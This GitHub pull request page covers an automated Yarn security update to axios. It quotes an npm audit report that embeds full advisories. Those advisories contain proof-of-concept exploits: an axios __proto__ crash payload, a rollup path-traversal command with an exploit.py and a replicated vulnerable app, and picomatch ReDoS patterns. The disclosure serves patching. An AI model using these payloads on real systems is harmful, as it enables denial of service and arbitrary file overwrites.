Skip to content

chore(deps): Update Yarn dependencies (security-updates)#437

Closed
nielsdrost7 wants to merge 1 commit intodevelopfrom
automated/yarn-update-26
Closed

chore(deps): Update Yarn dependencies (security-updates)#437
nielsdrost7 wants to merge 1 commit intodevelopfrom
automated/yarn-update-26

Conversation

@nielsdrost7
Copy link
Copy Markdown
Collaborator

@nielsdrost7 nielsdrost7 commented Apr 6, 2026
edited by coderabbitai bot
Loading

Yarn Dependency Update

This PR updates Yarn (npm) dependencies.

Update Type: security-updates
Triggered by: schedule

Lock File Status

✓ No lock file conflicts detected.

Updated Packages

╔═══════════════════════════════════════════════════════════════╗
║                    Package Update Report                     ║
╚═══════════════════════════════════════════════════════════════╝

📦 DIRECT DEPENDENCIES (from package.json)
─────────────────────────────────────────────────────────────────

  ✓ axios
    1.13.2 → 1.14.0


🔗 TRANSITIVE DEPENDENCIES (dependencies of dependencies)
─────────────────────────────────────────────────────────────────

  └─ proxy-from-env
     1.1.0 → 2.1.0


═════════════════════════════════════════════════════════════════
SUMMARY: 1 direct, 1 transitive (2 total)
═════════════════════════════════════════════════════════════════

Checks Performed

  • Assets built successfully
  • Dependencies installed and verified
  • Lock file conflicts checked

Security Audit

8 security vulnerabilities detected. Please review audit-report.json.

Review Checklist

  • Review updated packages and their changelogs
  • Verify assets build correctly
  • Check for breaking changes in frontend
  • Test UI changes in development environment
  • Verify no console errors in browser

This PR was automatically created by the Yarn Update workflow.

Summary by CodeRabbit

  • Bug Fixes

    • Updated axios from ^1.13.2 to ^1.14.0 to address security vulnerabilities
    • Updated transitive dependencies to resolve identified vulnerabilities

  • Chores

    • Documented security audit findings identifying 3 moderate and 5 high severity vulnerabilities in project dependencies

@coderabbitai
Copy link
Copy Markdown
Contributor

coderabbitai bot commented Apr 6, 2026
edited
Loading

📝 Walkthrough

Walkthrough

Added security audit reports documenting vulnerable dependencies (axios, rollup, picomatch) across multiple dependency chains and updated the axios dev dependency from ^1.13.2 to ^1.14.0. Replaced Composer package report with Node/npm package update information.

Changes

Cohort / File(s) Summary
Audit Reports
audit-before.json, audit-report.json		 Added security audit data documenting vulnerable dependencies with CVEs, advisories, affected versions, and severity levels. Includes 3 moderate and 5 high severity vulnerabilities across 156 total dependencies.
Dependency Updates
package.json, updated-packages.txt		 Updated axios dev dependency to ^1.14.0 and replaced Composer-based package report with Node/npm package update documentation showing axios (1.13.2→1.14.0) and proxy-from-env (1.1.0→2.1.0) upgrades.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~12 minutes

Possibly related PRs

Poem

🐰 Our warren was breached! But fear not, dear friend,
We've patched up the holes from the end to the end,
Axios now safer, with versions so bright,
Security audit reports shining so white! 🔐✨

🚥 Pre-merge checks | ✅ 3
✅ Passed checks (3 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title check ✅ Passed The title 'chore(deps): Update Yarn dependencies (security-updates)' accurately reflects the main change: updating npm/Yarn dependencies for security purposes, with axios and proxy-from-env being the specific packages updated.
Docstring Coverage ✅ Passed No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

✨ Finishing Touches
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Commit unit tests in branch automated/yarn-update-26

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

coderabbitai[bot]
coderabbitai bot reviewed Apr 6, 2026
View reviewed changes
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents 
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@audit-report.json`:
- Around line 1-9: The audit shows remaining high/moderate transitive
vulnerabilities in rollup (4.54.0) and picomatch (4.0.3 / 2.3.1); fix by either
adding an npm "overrides" entry that forces rollup => ^4.59.0 and picomatch =>
^4.0.4 (ensures vite's transitive rollup/picomatch are patched), or upgrade vite
to 8.x and also bump laravel-vite-plugin to a version that supports vite 8+
(e.g., laravel-vite-plugin v2+), ensuring the transitive rollup/picomatch
versions are upgraded; apply the overrides in package.json and run a fresh
install, or perform the vite + laravel-vite-plugin upgrade and re-audit to
confirm the advisories are gone.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration

Configuration used: defaults

Review profile: CHILL

Plan: Pro

Run ID: 27d4a681-ae21-40a2-9578-405a9a5271ab

📥 Commits

Reviewing files that changed from the base of the PR and between cc00605 and c05dd73.

⛔ Files ignored due to path filters (1)
  • yarn.lock is excluded by !**/yarn.lock, !**/*.lock
📒 Files selected for processing (4)
  • audit-before.json
  • audit-report.json
  • package.json
  • updated-packages.txt

audit-report.json
Comment on lines +1 to +9
{"type":"auditAdvisory","data":{"resolution":{"id":1113275,"path":"axios","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"1.13.2","paths":["axios"]}],"found_by":null,"deleted":null,"references":"- https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433\n- https://github.com/axios/axios/pull/7369\n- https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57\n- https://github.com/axios/axios/releases/tag/v1.13.5\n- https://nvd.nist.gov/vuln/detail/CVE-2026-25639\n- https://github.com/axios/axios/pull/7388\n- https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e\n- https://github.com/axios/axios/releases/tag/v0.30.3\n- https://github.com/advisories/GHSA-43fc-jf86-j433","created":"2026-02-09T17:46:14.000Z","id":1113275,"npm_advisory_id":null,"overview":"# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n const merge = mergeMap[prop] || mergeDeepProperties;\n const configValue = merge(config1[prop], config2[prop], prop);\n (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `'__proto__'`:\n\n1. `JSON.parse('{\"__proto__\": {...}}')` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `'__proto__'` in the iteration\n3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse('{\"__proto__\": {\"x\": 1}}');\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n at computeConfigValue (lib/core/mergeConfig.js:100:25)\n at Object.forEach (lib/utils.js:280:10)\n at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse('{\"__proto__\": {\"x\": 1}}')` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment occurs.","reported_by":null,"title":"Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig","metadata":null,"cves":["CVE-2026-25639"],"access":"public","severity":"high","module_name":"axios","vulnerable_versions":">=1.0.0 <=1.13.4","github_advisory_id":"GHSA-43fc-jf86-j433","recommendation":"Upgrade to version 1.13.5 or later","patched_versions":">=1.13.5","updated":"2026-02-18T17:16:29.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-754"],"url":"https://github.com/advisories/GHSA-43fc-jf86-j433"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1113515,"path":"vite>rollup","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.54.0","paths":["vite>rollup"]}],"found_by":null,"deleted":null,"references":"- https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\n- https://nvd.nist.gov/vuln/detail/CVE-2026-27606\n- https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\n- https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\n- https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\n- https://github.com/rollup/rollup/releases/tag/v2.80.0\n- https://github.com/rollup/rollup/releases/tag/v3.30.0\n- https://github.com/rollup/rollup/releases/tag/v4.59.0\n- https://github.com/advisories/GHSA-mw96-cpmx-2vgc","created":"2026-02-25T22:37:26.000Z","id":1113515,"npm_advisory_id":null,"overview":"### Summary\nThe Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.\n\n### Details\nThe vulnerability is caused by the combination of two flawed components in the Rollup core:\n\n1. **Improper Sanitization**: In `src/utils/sanitizeFileName.ts`, the `INVALID_CHAR_REGEX` used to clean user-provided names for chunks and assets excludes the period (`.`) and forward/backward slashes (`/`, `\\`). \n ```typescript\n // src/utils/sanitizeFileName.ts (Line 3)\n const INVALID_CHAR_REGEX = /[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g;\n ```\n This allows path traversal sequences like `../../` to pass through the sanitizer unmodified.\n\n2. **Unsafe Path Resolution**: In `src/rollup/rollup.ts`, the `writeOutputFile` function uses `path.resolve` to combine the output directory with the \"sanitized\" filename.\n ```typescript\n // src/rollup/rollup.ts (Line 317)\n const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);\n ```\n Because `path.resolve` follows the `../` sequences in `outputFile.fileName`, the resulting path points outside of the intended output directory. The subsequent call to `fs.writeFile` completes the arbitrary write.\n\n### PoC\nA demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.\n\n**Scenario: CLI Named Input Exploit**\n1. Target a sensitive file location (for demonstration, we will use a file in the project root called `pwned.js`).\n2. Execute Rollup with a specifically crafted named input where the key contains traversal characters:\n ```bash\n rollup --input \"a/../../pwned.js=main.js\" --dir dist\n ```\n3. **Result**: Rollup will resolve the output path for the entry chunk as `dist + a/../../pwned.js`, which resolves to the project root. The file `pwned.js` is created/overwritten outside the `dist` folder.\n\n**Reproduction Files provided :**\n* `vuln_app.js`: Isolated logic exactly replicating the sanitization and resolution bug.\n* `exploit.py`: Automated script to run the PoC and verify the file escape.\n\nvuln_app.js\n```js\nconst path = require('path');\nconst fs = require('fs');\n\n/**\n * REPLICATED ROLLUP VULNERABILITY\n * \n * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)\n * 2. Unsafe Path Resolution (from src/rollup/rollup.ts)\n */\n\nfunction sanitize(name) {\n // The vulnerability: Rollup's regex fails to strip dots and slashes, \n // allowing path traversal sequences like '../'\n return name.replace(/[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g, '_');\n}\n\nasync function build(userSuppliedName) {\n const outputDir = path.join(__dirname, 'dist');\n const fileName = sanitize(userSuppliedName);\n\n // Vulnerability: path.resolve() follows traversal sequences in the filename\n const outputPath = path.resolve(outputDir, fileName);\n\n console.log(`[*] Target write path: ${outputPath}`);\n\n if (!fs.existsSync(path.dirname(outputPath))) {\n fs.mkdirSync(path.dirname(outputPath), { recursive: true });\n }\n\n fs.writeFileSync(outputPath, 'console.log(\"System Compromised!\");');\n console.log(`[+] File written successfully.`);\n}\n\nbuild(process.argv[2] || 'bundle.js');\n\n```\n\nexploit.py\n```py\nimport subprocess\nfrom pathlib import Path\n\ndef run_poc():\n # Target a file outside the 'dist' folder\n poc_dir = Path(__file__).parent\n malicious_filename = \"../pwned_by_rollup.js\"\n target_path = poc_dir / \"pwned_by_rollup.js\"\n\n print(f\"=== Rollup Path Traversal PoC ===\")\n print(f\"[*] Malicious Filename: {malicious_filename}\")\n \n # Trigger the vulnerable app\n subprocess.run([\"node\", \"poc/vuln_app.js\", malicious_filename])\n\n if target_path.exists():\n print(f\"[SUCCESS] File escaped 'dist' folder!\")\n print(f\"[SUCCESS] Created: {target_path}\")\n # target_path.unlink() # Cleanup\n else:\n print(\"[FAILED] Exploit did not work.\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n## POC \n```rollup --input \"bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js\" --dir dist```\n\n<img width=\"1918\" height=\"1111\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3474eb7c-9c4b-4acd-9103-c70596b490d4\" />\n\n\n\n### Impact\nThis is a **High** level of severity vulnerability.\n* **Arbitrary File Write**: Attackers can overwrite sensitive files like `~/.ssh/authorized_keys`, `.bashrc`, or system binaries if the build process has sufficient privileges.\n* **Supply Chain Risk**: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase.\n* **User Impact**: Developers running builds on untrusted repositories are at risk of system compromise.","reported_by":null,"title":"Rollup 4 has Arbitrary File Write via Path Traversal","metadata":null,"cves":["CVE-2026-27606"],"access":"public","severity":"high","module_name":"rollup","vulnerable_versions":">=4.0.0 <4.59.0","github_advisory_id":"GHSA-mw96-cpmx-2vgc","recommendation":"Upgrade to version 4.59.0 or later","patched_versions":">=4.59.0","updated":"2026-02-25T22:37:27.000Z","cvss":{"score":0,"vectorString":null},"cwe":["CWE-22"],"url":"https://github.com/advisories/GHSA-mw96-cpmx-2vgc"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115551,"path":"vite>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115551,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115551,"path":"vite>tinyglobby>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115551,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115554,"path":"vite>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115554,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115554,"path":"vite>tinyglobby>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115554,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115549,"path":"laravel-vite-plugin>vite-plugin-full-reload>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"2.3.1","paths":["laravel-vite-plugin>vite-plugin-full-reload>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115549,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":"<2.3.2","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 2.3.2 or later","patched_versions":">=2.3.2","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
